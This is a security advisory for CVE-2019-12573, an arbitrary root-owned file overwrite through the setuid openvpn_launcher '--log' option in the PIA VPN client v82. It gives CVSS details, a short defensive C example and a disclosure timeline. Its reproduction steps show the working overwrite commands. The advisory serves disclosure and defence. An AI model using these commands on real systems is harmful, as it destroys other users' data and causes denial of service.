security-research/vulnerabilities/PIA/CVE-2019-12573.txt
Title: PIA Linux, macOS Arbitrary File Overwrite
Author: Rich Mirch
CVE: CVE-2019-12573
Vendor Advisory: N/A

Description
A vulnerability in the London Trust Media Private Internet Access (PIA)
VPN Client v82 for Linux and macOS could allow an authenticated, local
attacker to overwrite arbitrary files.

The PIA Linux and macOS openvpn_launcher binary is setuid root. This
binary supports the --log option, which accepts a path as an argument.
The --log parameter is not sanitized, which allows a local unprivileged
user to overwrite arbitrary files owned by any user on the system, including
root. This creates a denial of service condition and possible data loss
if leveraged by a malicious local user.
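
One way a setuid-root program can handle a user-supplied log path such as the --log argument described above, shown as an added example that is not PIA's code or the vendor's fix. The helper name open_log_as_caller() is hypothetical; it opens the file with the invoking user's IDs and refuses symlinks and files the caller does not own.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not PIA code: open a caller-supplied log path from a
 * setuid-root program using the invoking user's permissions, not root's.
 * Returns a file descriptor, or -1 with errno set on refusal or failure. */
int open_log_as_caller(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();
    struct stat st;
    int fd = -1, saved;

    /* Switch effective IDs to the real (invoking) user: group first, while
     * still privileged, then user. The kernel now checks the caller's rights. */
    if (setegid(rgid) == 0 && seteuid(ruid) == 0) {
        /* O_NOFOLLOW refuses a symlink as the final component; no O_TRUNC, so
         * an existing file is appended to. O_NONBLOCK avoids stalling on a FIFO. */
        fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW |
                        O_NONBLOCK | O_CLOEXEC, 0600);
        /* Accept only a regular file that the caller owns. */
        if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
                        st.st_uid != ruid)) {
            close(fd);
            fd = -1;
            errno = EPERM;
        }
    }
    saved = errno;
    /* Regain the original effective IDs for the work that needs them. */
    if (seteuid(euid) != 0 || setegid(egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = saved;
    return fd;
}

int main(int argc, char **argv)
{
    int fd = argc > 1 ? open_log_as_caller(argv[1]) : -1;
    return fd < 0; /* exit status 1 when the path is missing or refused */
}
```

Because the open runs with the invoking user's IDs, a root-owned mode 600 file such as the /etc/test.txt used in the steps below is refused with EACCES for an unprivileged caller.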

CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C
Base: 7.1
Temporal: 7.1

Test Environment
OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82

OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82

Steps to reproduce
Step 1 - Create a root-owned test file. For this PoC /etc/test.txt is used.

# As root
echo "this is a test" > /etc/test.txt
chmod 600 /etc/test.txt

Step 2 - Overwrite the file with the --log option as a non-privileged user.

# macOS
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt

# Linux
/opt/pia/openvpn_launcher.64 --log /etc/test.txt

Step 3 - Verify the file contents have been overwritten.

# As root
cat /etc/test.txt

Timeline:
2018-12-23: Reported to vendor
2018-12-23: Vendor acknowledged receipt of report
2019-01-18: Vendor states a fix will be available in v83; however, this version was never released.
            The desktop client was rewritten. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure